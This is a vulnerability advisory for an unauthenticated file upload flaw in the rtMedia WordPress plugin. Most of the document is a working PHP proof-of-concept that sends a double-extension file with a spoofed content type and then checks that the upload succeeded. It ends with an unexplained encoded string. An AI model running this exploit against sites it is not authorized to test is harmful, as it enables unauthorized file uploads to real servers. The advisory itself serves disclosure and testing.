rtMedia for WordPress, BuddyPress and bbPress [Unauthenticated File Upload]

Description

This vulnerability doesn’t seem like it could lead to a server compromise, unless unusual server configuration is in use. Exploitation attempts seemed to try to upload a file that would only execute the phpinfo() function, probably to check if file extensions that pass plugin’s security checks are treated as executables on the vulnerable server.

Plugin includes the file buddypress-media/app/helper/rtUploadAttachment.php which implements insufficient security checks, thus allowing unauthenticated users to upload files to the vulnerable server. A whitelist is used that allows only jpg, jpeg, png, gif, zip, doc, docx, pdf and txt files.

PoC

#!/usr/bin/env php
<?php
/*******************************************************************************
 * rtMedia for WordPress, BuddyPress and bbPress [Unauthenticated File Upload]
 *
 * Exploit Author: Panagiotis Vagenas <pan.vagenas@gmail.com>
 * To install deps run `composer install`
 ******************************************************************************/

require_once 'vendor/autoload.php';

use Wordfence\ExKit\Cli;
use Wordfence\ExKit\Config;
use Wordfence\ExKit\Endpoint;
use Wordfence\ExKit\ExitCodes;
use Wordfence\ExKit\Request;

$url = Config::get( 'url.base', null, true, 'Enter the site URL' );

if ( ! $url ) {
    ExitCodes::exitWithFailedPrecondition( 'You must enter a valid URL' );
}

$identifier = uniqid();
$fileName   = $identifier . '.php.docx';

Cli::writeInfo( 'Sending payload...' );

$r = Request::upload(
    Endpoint::pluginsURL() . '/buddypress-media/app/helper/rtUploadAttachment.php',
    [],
    [
        'file' => [
            'fileContents' => "$identifier",
            'fileName'     => $fileName,
            'contentType'  => 'image/png'
        ]
    ]
);

$rJson = @json_decode( $r->body );
if ( ! $r->success || ! $rJson || ! isset( $rJson->debug_attachmanet ) || ! $rJson->debug_attachmanet ) {
    ExitCodes::exitWithFailed( 'Upload failed' );
}

Cli::writeInfo( 'File uploaded on ' . $rJson->debug_attachmanet[0] );

Cli::writeInfo( 'Validating exploit...' );

$path = substr( $rJson->debug_attachmanet[0], strpos( $rJson->debug_attachmanet[0], '/wp-content/' ) );

$r = Request::get( Endpoint::baseURL() . $path );

if ( ! $r->success || trim( $r->body ) != $identifier ) {
    ExitCodes::exitWithFailed( 'Failed to validate upload...' );
}

ExitCodes::exitWithSuccess( 'Exploitation successful!' );

INFO
GKxtL3WcoJHtnKZtqTuuqPOiMvOwqKWco3AcqUxX